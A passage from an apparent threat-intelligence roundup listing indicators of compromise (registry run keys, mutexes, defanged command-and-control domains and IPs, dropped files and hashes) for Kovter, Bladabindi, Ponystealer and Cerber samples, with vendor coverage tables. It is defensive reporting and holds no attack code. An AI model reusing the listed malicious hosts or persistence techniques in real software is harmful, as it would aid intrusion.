| 1 \n`PSPSndkvsdvd0199201` | 1 \n`PuredairyBB1` | 1 \n`PuredairyBB5` | 1 \n`PuredairyBB3` | 1 \n`PuredairyBB16` | 1 \n`PuredairyBB17` | 1 \n`PuredairyBB18` | 1 \n`PuredairyBB22` | 1 \n`PuredairyBB20` | 1 \n`PuredairyBB21` | 1 \n`PuredairyBB19` | 1 \n`PuredairyBB29` | 1 \n`PuredairyBB31` | 1 \n \n*See JSON for more IOCs\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`195[.]22[.]26[.]248` | 2 \n`23[.]253[.]126[.]58` | 2 \n`184[.]105[.]192[.]2` | 6 \n`104[.]239[.]157[.]210` | 2 \n`104[.]42[.]225[.]122` | 8 \n`40[.]90[.]247[.]210` | 5 \n`40[.]91[.]124[.]111` | 4 \n`20[.]45[.]1[.]107` | 9 \n`109[.]120[.]180[.]29` | 2 \n`94[.]102[.]52[.]19` | 1 \n`217[.]23[.]8[.]142` | 1 \n`109[.]236[.]86[.]119` | 1 \n`93[.]190[.]140[.]141` | 1 \n`108[.]59[.]2[.]221` | 1 \n`109[.]236[.]83[.]12` | 1 \n`80[.]82[.]65[.]207` | 1 \n`217[.]23[.]3[.]105` | 1 \n`217[.]23[.]4[.]220` | 1 \n`93[.]190[.]140[.]113` | 1 \n`217[.]23[.]9[.]104` | 1 \n`93[.]190[.]142[.]191` | 1 \n`94[.]102[.]51[.]231` | 1 \n`217[.]23[.]7[.]3` | 1 \n`80[.]82[.]65[.]199` | 1 \n`109[.]236[.]86[.]27` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`europe[.]pool[.]ntp[.]org` | 9 \n`www[.]update[.]microsoft[.]com[.]nsatc[.]net` | 9 \n`and10[.]uzuzuseubumaandro[.]com` | 1 \n`powerrembo[.]ru` | 2 \n`and4[.]junglebeariwtc1[.]com` | 1 \n`faumoussuperstars[.]ru` | 2 \n`martivitapoint[.]info` | 1 \n`and10[.]uzuzuseubumaandro1[.]com` | 1 \n`spotxte[.]com` | 1 \n`nutqauytva8azxd[.]com` | 2 \n`nutqauytva100azxd[.]com` | 2 \n`nutqauytva2azxd[.]com` | 2 \n`nutqauytva10azxd[.]com` | 2 \n`nutqauytva6azxd[.]com` | 2 \n`nutqauytva11azxd[.]com` | 2 \n`nutqauytva3azxd[.]com` | 2 \n`nutqauytva9azxd[.]com` | 2 \n`nutqauytva7azxd[.]com` | 2 \n`nutqauytva5azxd[.]com` | 2 \n`nutqauytva4azxd[.]com` | 2 \n`109[.]120[.]180[.]29` | 1 \n`vedivenivici[.]ml` | 2 \n`delvernet[.]info` | 2 \n`otter[.]pw` | 2 \n`oingee[.]pw` | 2 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`\\Documents and Settings\\All Users\\mslkrru.exe` | 9 \n`%APPDATA%\\WindowsUpdate` | 1 \n`\\RECYCLER` | 7 \n`\\RECYCLER\\S-1-5-21-0243556031-888888379-781862338-18611771` | 5 \n`\\TEMP\\C\\UPDATE` | 1 \n`%APPDATA%\\WindowsUpdate\\MSupdate.exe` | 1 \n`%APPDATA%\\alFSVWJB` | 2 \n`%ProgramData%\\msodtyzm.exe` | 11 \n`\\RECYCLER\\S-1-5-21-0243556031-888888379-781862338-1861771` | 2 \n`%ProgramData%\\~` | 11 \n`%APPDATA%\\alFSVWJB\\twunk_16.exe` | 1 \n`%APPDATA%\\winamfes.exe` | 2 \n`%APPDATA%\\alFSVWJB\\splwow64.exe` | 1 \n`%TEMP%\\-1631195624.bat` | 1 \n`%TEMP%\\115828.bat` | 1 \n`%APPDATA%\\alFSVWJB\\winhlp32.exe` | 1 \n \n#### File Hashes\n\n` 0e6f120bd1607731a34778c8d2f3a038414dd3d263ca25c5e5941558ece492ca 1237cef1686205e9854f84be62f474247279e72dedc0b5e871b7c07c9c5126e4 1d453682f2771631919717c54b95b6e90a1e4231c9c503ef4b5fa302e247d314 1f7c808b0fb82df3a2e27e4819224d176f1be5dca98752ca0545591e740112e6 20ba9da6df29a870a6826425b23b7508606bdaad662f0238da378091ed1067ef 2324b414e6300fab1abdc2d1e5bb128544c94419dcc6656b105bc69865480d88 36b578d5abac82fd7db98a77869112dbf7e0bfa8433febca08b1c16370f68a2f 3887f3a97e906d5bd9d94ba1117953c46ba0dd1cd5fbae4653f4cd1924ae258e 5f4293450ad2aca70c70bdc55bfa2db00bc500b73000814a9b995f940c4e8c41 68b13c4a8a9fe01bf0567627d099b1a6cb98eef7bd4762bbee5420efbcc8a470 693086bd9b704e5927f76f40a8b04136b1f7d94a482a9020126819a407d24aa8 6edddbf48f261ae99c5a7dfd3fc2c443a3674f68ca3076b391c89e7023dc4c54 70c203465f54113975e075563cf824ba3632a3227eddd38c651b8f5a58cf2bae 7b3c8d5208b4c9e1747e670c67d44a581c68e299a486eba6d7f96cbe527e6855 7b3efe2cf5dc30bf2329986bdcd680f4195a8f750f507e96a3395d8a4a9310fb 82687cd40932329348005bb61782e5b5493faae26389d7a3300e5ba40af04dce 87892d4d4693dc87d4195a0aa30bba294841580f2a4c81948c37018b69dc69d8 966eac6b067db2163c8e82669373c17ea335fff18280f848e6b8202e00a905d2 98788fbe094bd1260aaa7120fa02cf183ab09f7a32c0a4cba68074316c276ce6 aa6eea166b8cffd5763b79f47f6f8cbeea328a056e7a0152ceb104cc59c1e320 bec5979b7d191703cbce4a4c88171b89ab97b07fba0e0dd001ffe8dee9689049 d3f847257945d883bc02431f7561d661b56b7177941b5d7451528bdfc28b4ca6 d6f2570910b38e15acb876ced00d7f877fa9ded01a15c3e07710319a50adf8cb d7f4e9cab07e8c2826ee70b6a45d51b18892cfa5d4a92ce318c43eed2399fe54 da93ffcafad1569fd94cb5bae72a876bf6e021b7ad30b4d644a99ceb88651bc6 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-essWD6jQn98/XkbkvQMAvWI/AAAAAAAADSo/bh8oOsTllLUEQwUn1IophA4XDimJYhOyACLcBGAsYHQ/s1600/5f4293450ad2aca70c70bdc55bfa2db00bc500b73000814a9b995f940c4e8c41_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-XUwmAjmy9ew/XkbkzJwdRGI/AAAAAAAADSs/xPUmGpebw9w7DDIYT8tr5woLymKe-hbrQCLcBGAsYHQ/s1600/5f4293450ad2aca70c70bdc55bfa2db00bc500b73000814a9b995f940c4e8c41_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-pnZSPvSBJmk/Xkbk33ih9QI/AAAAAAAADSw/bO3pg221ueYN8fpJxUqsIARE5fAeurJjACLcBGAsYHQ/s1600/1237cef1686205e9854f84be62f474247279e72dedc0b5e871b7c07c9c5126e4_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.Kovter-7581113-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE \nValue Name: DisableOSUpgrade ` | 15 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE\\OSUPGRADE \nValue Name: ReservationsAllowed ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: 656f27d6 ` | 15 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: 656f27d6 ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: 96f717b3 ` | 15 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: 96f717b3 ` | 15 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE ` | 15 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 ` | 15 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE\\OSUPGRADE ` | 15 \n`<HKCR>\\.8CA9D7 ` | 15 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: eed5bf47 ` | 15 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: edfc5b63 ` | 15 \n`<HKCR>\\C3B61 ` | 15 \n`<HKCR>\\C3B61\\SHELL ` | 15 \n`<HKCR>\\C3B61\\SHELL\\OPEN ` | 15 \n`<HKCR>\\C3B61\\SHELL\\OPEN\\COMMAND ` | 15 \n`<HKCR>\\.8CA9D7 ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: ffcfae7b ` | 15 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: ffcfae7b ` | 15 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: 78758f10 ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: 78758f10 ` | 15 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: c3ab6058 ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: c3ab6058 ` | 15 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 8567f942 ` | 15 \nMutexes | Occurrences \n---|--- \n`EA4EC370D1E573DA` | 15 \n`A83BAA13F950654C` | 15 \n`Global\\7A7146875A8CDE1E` | 15 \n`B3E8F6F86CDD9D8B` | 15 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`162[.]59[.]22[.]216` | 1 \n`203[.]220[.]231[.]209` | 1 \n`35[.]30[.]2[.]211` | 1 \n`65[.]168[.]33[.]91` | 1 \n`65[.]23[.]68[.]193` | 1 \n`8[.]111[.]224[.]146` | 1 \n`190[.]95[.]112[.]80` | 1 \n`17[.]163[.]64[.]9` | 1 \n`75[.]177[.]69[.]90` | 1 \n`166[.]105[.]213[.]36` | 1 \n`214[.]63[.]237[.]80` | 1 \n`36[.]91[.]76[.]70` | 1 \n`106[.]70[.]177[.]221` | 1 \n`16[.]191[.]214[.]15` | 1 \n`58[.]13[.]27[.]49` | 1 \n`192[.]86[.]250[.]64` | 1 \n`126[.]167[.]218[.]58` | 1 \n`15[.]150[.]185[.]79` | 1 \n`136[.]59[.]133[.]35` | 1 \n`14[.]24[.]198[.]67` | 1 \n`60[.]255[.]136[.]37` | 1 \n`35[.]118[.]226[.]214` | 1 \n`39[.]29[.]235[.]49` | 1 \n`154[.]111[.]27[.]104` | 1 \n`166[.]82[.]242[.]42` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]litespeedtech[.]com` | 1 \n`schema[.]org` | 1 \n`api[.]w[.]org` | 1 \n`gmpg[.]org` | 1 \n`pinterest[.]com` | 1 \n`httpd[.]apache[.]org` | 1 \n`bugs[.]debian[.]org` | 1 \n`www[.]anrdoezrs[.]net` | 1 \n`shareasale[.]com` | 1 \n`help[.]smartertools[.]com` | 1 \n`www[.]smartertools[.]com` | 1 \n`www[.]pntrs[.]com` | 1 \n`cdn10[.]bigcommerce[.]com` | 1 \n`cowgirldelight[.]com` | 1 \n`lppool[.]catalogsites[.]net` | 1 \n`www[.]rods[.]com` | 1 \n`checkspressions[.]com` | 1 \n`www[.]womensbootshop[.]com` | 1 \n`www[.]cssigniter[.]com` | 1 \n`passets-cdn[.]pinterest[.]com` | 1 \n`www[.]pntra[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%LOCALAPPDATA%\\4dd3c` | 15 \n`%LOCALAPPDATA%\\4dd3c\\519d0.bat` | 15 \n`%LOCALAPPDATA%\\4dd3c\\8e986.8ca9d7` | 15 \n`%LOCALAPPDATA%\\4dd3c\\d95ad.lnk` | 15 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\91b4e.lnk` | 15 \n`%APPDATA%\\b08d6` | 15 \n`%APPDATA%\\b08d6\\0b3c0.8ca9d7` | 15 \n \n#### File Hashes\n\n` 0bc765c9bdad7dea5fee981fa1ea3e39d39b43110991be6767062b5b3e04f72c 127fb45d6030c7ccccee832b5ce576786dbaae5df9b56894b69257e5217e294a 2ae6974b7efe312d521686e6852eeb699f2a73775742736b85b597e0ef3aa431 2fc52ad46802099597893005722950b74ac8625908227d1127a00666c4b335b9 30814d58a34c1f93bca33a91dff01df3d51d79652e03ee1d4268d4f3731c32e2 37ead0eac4578acd43bca94f7c952ca0ba292501902f3c24e2867d4c76987394 7271bdf260d1c23f06c6900ae8627662ae10029d1807128307bdfdaf216ec717 797903efd668c3b3f81419f0f14ed2c1877f051b237ca186f17559a536334d5c 7acad96af327bcdb132c8050fc85323173ac58b1efe91cadb529d2f9b4d98b27 82a312a0219ad8597a6d23b707103bbc5e5ba5a8f05754bf2c4904d857cd4c17 ab0bd0ecb30c8097d5270d8f4a093587dc92ac8b129a169c0488d74ad8a67037 b0b20a68922dc981bf2a4dcdda0545c0f870331a6eef2dc474fefe4d2e7af806 b7e3127dc7f2729513628861b8ee60609a1c20eedcd9b6551314dd0eeedd817e beaa66c363f78e7bae7d9e16fdfaa2bad12a568db71f59a87ecfb675e8fef110 cef415b47d807cb26e0881d6d79ac1ab4cbb77e1671cdcb5804982309481a18d `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-rHmOGYUnn3s/XkblI9uCPbI/AAAAAAAADTA/hTPnFRS2Is41M-ewgT-M8IsL59hsFItgwCLcBGAsYHQ/s1600/b0b20a68922dc981bf2a4dcdda0545c0f870331a6eef2dc474fefe4d2e7af806_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-7yDofoCL-Fs/XkblNUumwAI/AAAAAAAADTE/BxQtrDXc0y4VUTtwioNP4Kxhg7C8kP9NACLcBGAsYHQ/s1600/b0b20a68922dc981bf2a4dcdda0545c0f870331a6eef2dc474fefe4d2e7af806_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### PUA.Win.Trojan.Bladabindi-7581164-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\ENVIRONMENT \nValue Name: SEE_MASK_NOZONECHECKS ` | 17 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: ParseAutoexec ` | 17 \n`<HKCU>\\SOFTWARE\\7261D3F24AE2C8DCAF22FAF7FCF1CAFD ` | 17 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 7261d3f24ae2c8dcaf22faf7fcf1cafd ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 7261d3f24ae2c8dcaf22faf7fcf1cafd ` | 17 \n`<HKCU>\\SOFTWARE\\7261D3F24AE2C8DCAF22FAF7FCF1CAFD \nValue Name: [kl] ` | 17 \nMutexes | Occurrences \n---|--- \n`qazwsxedc` | 17 \n`7261d3f24ae2c8dcaf22faf7fcf1cafd` | 17 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`shareefboy[.]ddns[.]net` | 17 \nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\Start Menu\\Programs\\Startup\\x.vbs` | 16 \n`%TEMP%\\server.exe` | 17 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x.vbs` | 16 \n`\\423002248.exex (copy)` | 1 \n`%TEMP%\\server.exex (copy)` | 17 \n \n#### File Hashes\n\n` 00cf99575699bc66ebbb6420a94c31ed8acad4107031546e04f9576546c276e5 245938f3b18f371c90e5403b454cadfa791d97767d9aa05439d6b852fbffd714 285cb077ca516c336a1636182069e7cf9a8a057a267efa376ebede4c0a2cd0bf 29dba26459bba5b186f1bf1c0a0fffc0e393a6d4cc427c842a4aee0353518a2c 2de7a2aa518ea9e0fbc421761c85be589c27c88c3038fa4fa93bef51bacd67bd 344204f0902906b808c5f81ae62b455a3d0ded3034fca548230cd51c59f02ec4 388bfe746f61ade70292f8740d1c92c6eceaa21baa5e04de0ebc012dbed312e7 66d6a4049df4e8bc2fd9c615af0bc3d0ae715ea5b17c5222980f67bd6d57d75e 7d2e2395490ac37029cd98039afa8991f718c5121b1e6e326713e99c26aacb28 8e7ea6439f856525f2affc885f93a23e2f7ade71aecc69c8cd78e5460d4aa58b ae078923fc539c22a7eff4491301ae2c8f438e79a02226e6604b7035aff34ec5 aee215905b39a4a4cc85be54bda2ae9ded42e06fe0b3813a1794052a12e09757 c7a9a427985e84f296370c466eb675ff01b06992416ac9250c385cfaa5a9678d d2af08616f7d2dc0f68d75376d3164867732871348c8101aa0319c90062f999b d75a26758530f775943a9d16680ee4c37e913ab20d6953e965ae41f3e5fd3a88 d7ec97fb65437711f6dd0ce71e8cab70946d2c8f51566446a8fe8e8b64cbda62 fd05573a8360e8054c0ebc38c5cdd107e68b9694525829e832a3085c7d9a556b `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-W5F1RN8Tm7I/Xkblcv7o31I/AAAAAAAADTM/tWcW6CL0BuE_G9-sU9ew3Pe1cB9SjFz-wCLcBGAsYHQ/s1600/7d2e2395490ac37029cd98039afa8991f718c5121b1e6e326713e99c26aacb28_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-ySnPmdkZ4R0/XkblhtE_bmI/AAAAAAAADTU/SW1w7x44-dYrOt3fVXzasbj_YktfYNZnACLcBGAsYHQ/s1600/7d2e2395490ac37029cd98039afa8991f718c5121b1e6e326713e99c26aacb28_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Ponystealer-7581286-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\WINRAR \nValue Name: HWID ` | 17 \n`<HKCU>\\SOFTWARE\\WINRAR ` | 17 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000003E9 \nValue Name: F ` | 17 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000001F5 \nValue Name: F ` | 17 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000003EC \nValue Name: F ` | 17 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`194[.]4[.]56[.]252` | 17 \n`212[.]129[.]7[.]131` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`myp0nysite[.]ru` | 17 \n`streetcode3[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\Start Menu\\Programs\\Startup\\filename.vbe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\filename.vbe` | 17 \n`%APPDATA%\\subfolder` | 17 \n`%APPDATA%\\subfolder\\filename.bat` | 17 \n`%TEMP%\\811953.bat` | 1 \n`%TEMP%\\-1509909074.bat` | 1 \n \n#### File Hashes\n\n` 13400f8d7c8a12d8958a46992e9eed2b2f1151ae33fcd0c248bc35e58cfb7ce5 182f6e283a097173aaedb18790a25cf8d923918e715568b88446a345d086fcc0 2c20c1f5d4995dcccf424f00ceb0ed472cb4565ee7b06c9cb70b08b478eaf2f1 2deca9e99719e851fd53cee5ac5dfbd07b119bc707b7aa81cb55c38c8883a772 3182728acec97bc151ebae0a6adfac92ab26acf0c5aa1ab5194926b5e36f4d43 5a4373916b36d08a40753dbcdac9f5a4463ce04e34c9d91370ed3eb26d9e02ee 73ef9e3fd88857d97750893acb03308bb1deb980ca8ca601087bb9a1f74362a6 8dfce3b2ccb67e4d7fe864898a1464f74a536e14bd4104dff9de8c399d42c2b7 8fe9aeaa722e13e842520e578ed099670bc59c882b59a6fb413dc6fcf590665a 955b6ea1a4087486a22b60ca2453343b04ac01e5c161615b13fd8bd22192c76d 9a10bb237ac45ffee5878cdfe094a0b0f6f81d9eba8ec21033b8020391c1324f bd4aa94a35201221e31df703e1140180c8f310ce7f08b81960185a2b784a98c0 ce3e0e36ac012f0f464181de7a21c87bfa1c5c334a11b7569ddb5dd4222c95e6 d07112d2911677ee1e1722bd168dff54d480c3ce8a9f78a84bf3339a885b0174 e2546be50a578b421d55de25bb7d7aff0ef84b5246d1d7d6f8ca8908da415ef4 e48083bef42265f0c16b3cb6fef65a4206f152b3cfdb28f517e15ca8a660ffed fe83421fb5c10e194127d3b3d02e4bf2d1d951291bd935641d80f19bbf6ba620 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-ZzGH1lfQaOM/Xkbl1DWh3cI/AAAAAAAADTg/5TealMCAQCwGV1Zr6ljcNU2rdZHiVw1ZACLcBGAsYHQ/s1600/182f6e283a097173aaedb18790a25cf8d923918e715568b88446a345d086fcc0_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-61hbPOtrq-I/Xkbl5sOFfsI/AAAAAAAADTk/0gll55PTzw8pVUvAL9kP9MMil-bAEgOKwCLcBGAsYHQ/s1600/182f6e283a097173aaedb18790a25cf8d923918e715568b88446a345d086fcc0_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-fPRNlwGrXtI/Xkbl_YvhU1I/AAAAAAAADTo/bpbeNHbR40kZwAtGk5U5wxxoMD39ioBIACLcBGAsYHQ/s1600/816593fbb5469d27ac05c4eeaed262ce5486ceef3aa50f6a5991dbf87e0b6e29_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Ransomware.Cerber-7582361-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\CONTROL PANEL\\DESKTOP \nValue Name: TileWallpaper ` | 7 \n`<HKCU>\\CONTROL PANEL\\DESKTOP \nValue Name: WallpaperStyle ` | 7 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\SPEECH\\VOICES \nValue Name: DefaultTokenId ` | 6 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\SPEECH\\VOICES ` | 6 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER \nValue Name: PendingFileRenameOperations ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: {32382BC4-48A5-6DE8-F0EE-B8109DEC3228} ` | 2 \nMutexes | Occurrences \n---|--- \n`shell.{<random GUID>}` | 8 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`13[.]107[.]21[.]200` | 2 \n`204[.]79[.]197[.]200` | 3 \n`15[.]49[.]2[.]0/27` | 8 \n`122[.]1[.]13[.]0/27` | 8 \n`194[.]165[.]17[.]0/25` | 8 \n`95[.]213[.]195[.]123` | 2 \n`91[.]142[.]90[.]61` | 7 \n`31[.]41[.]47[.]50` | 5 \n`31[.]41[.]47[.]31` | 1 \n`195[.]19[.]192[.]99` | 2 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`maxcdn[.]bootstrapcdn[.]com` | 1 \n`get[.]adobe[.]com` | 4 \n`en[.]wikipedia[.]org` | 14 \n`www[.]torproject[.]org` | 7 \n`www[.]collectionscanada[.]ca` | 7 \n`alpha3[.]suffolk[.]lib[.]ny[.]us` | 7 \n`www[.]archives[.]gov` | 7 \n`www[.]vitalrec[.]com` | 7 \n`www[.]cdc[.]gov` | 7 \n`hldsfuh[.]info` | 1 \n`mmteenijjjuyoqju[.]info` | 1 \n`ydgsjrjqotlffitfg[.]org` | 1 \n`dxpmkdipp[.]info` | 1 \n`cojkhmdxrwvxwxa[.]pw` | 1 \n`qgilcuym[.]org` | 1 \n`www[.]multicounter[.]de` | 9 \n`pqhwfeeivtkxi[.]click` | 5 \n`othcijmuhwb[.]pl` | 4 \n`iconhrdqmeueg[.]su` | 2 \n`cdwguymjxnyot[.]pl` | 3 \n`veiqvqirdhmyis[.]org` | 4 \n`qoaouhgwfy[.]biz` | 2 \n`hkwyfnevdievebgjx[.]xyz` | 2 \n`ligumssfsrtfpy[.]xyz` | 4 \n`rqtcmltkurtev[.]pw` | 2 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\Contacts\\Administrator.contact` | 15 \n`%TEMP%\\d19ab989\\4710.tmp` | 8 \n`%TEMP%\\d19ab989\\a35f.tmp` | 8 \n`\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\_14-INSTRUCTION.html` | 7 \n`\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\_15-INSTRUCTION.html` | 7 \n`\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\_16-INSTRUCTION.html` | 7 \n`\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\_17-INSTRUCTION.html` | 7 \n`\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\_18-INSTRUCTION.html` | 7 \n`\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\_19-INSTRUCTION.html` | 7 \n`\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\_20-INSTRUCTION.html` | 7 \n`%ProgramData%\\Adobe\\Updater6\\_21-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\_22-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\_24-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\_26-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\_25-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\_28-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\_27-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\IlsCache\\_29-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\Network\\Downloader\\_46-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\_45-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\OfficeSoftwareProtectionPlatform\\_48-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\RAC\\PublishedData\\_44-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\RAC\\StateData\\_41-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\User Account Pictures\\Default Pictures\\_33-INSTRUCTION.html` | 7 \n`%ProgramData%\\Microsoft\\User Account Pictures\\_34-INSTRUCTION.html` | 7 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0670326e0572ca61e6a1f9b654088f5ac91fd3426dcba932377c801763fe5906 085198d732095e24f5165d61636930cb1012b833278d86565a66d23dd0ffce96 14f9231bd987060133bc1e2908a9a5691e829d6f2cc43010f943e4070b0102cf 2f5776b368011a76db2c690252846d0e3a90ccd27d9575e015663cebaf58db23 5815f647ad348de649c3ebfb5f1987e305410855cc944d14b1284abaaa40d9e3 593ead1c717d2ca3ed32fa98da70f4df7e0a99431d0327fc08c363621afc1fbe a515545e6056e1a9f75a4f7d0afefb54bf7e1ffb1e5f7f6641cece38db7e6cf0 bebd3b1683b69a383af7689f70ad3e3992630e0fc07d98e2e014f4978136722a c11b9d1ba0badcc063eb6e60894b7f4f0932e4f73d037f05e06c80d72833b328 c4cfc1a33b5e956376c773674c1a8baa318832f2d75fac9efe53fbc895ace7da 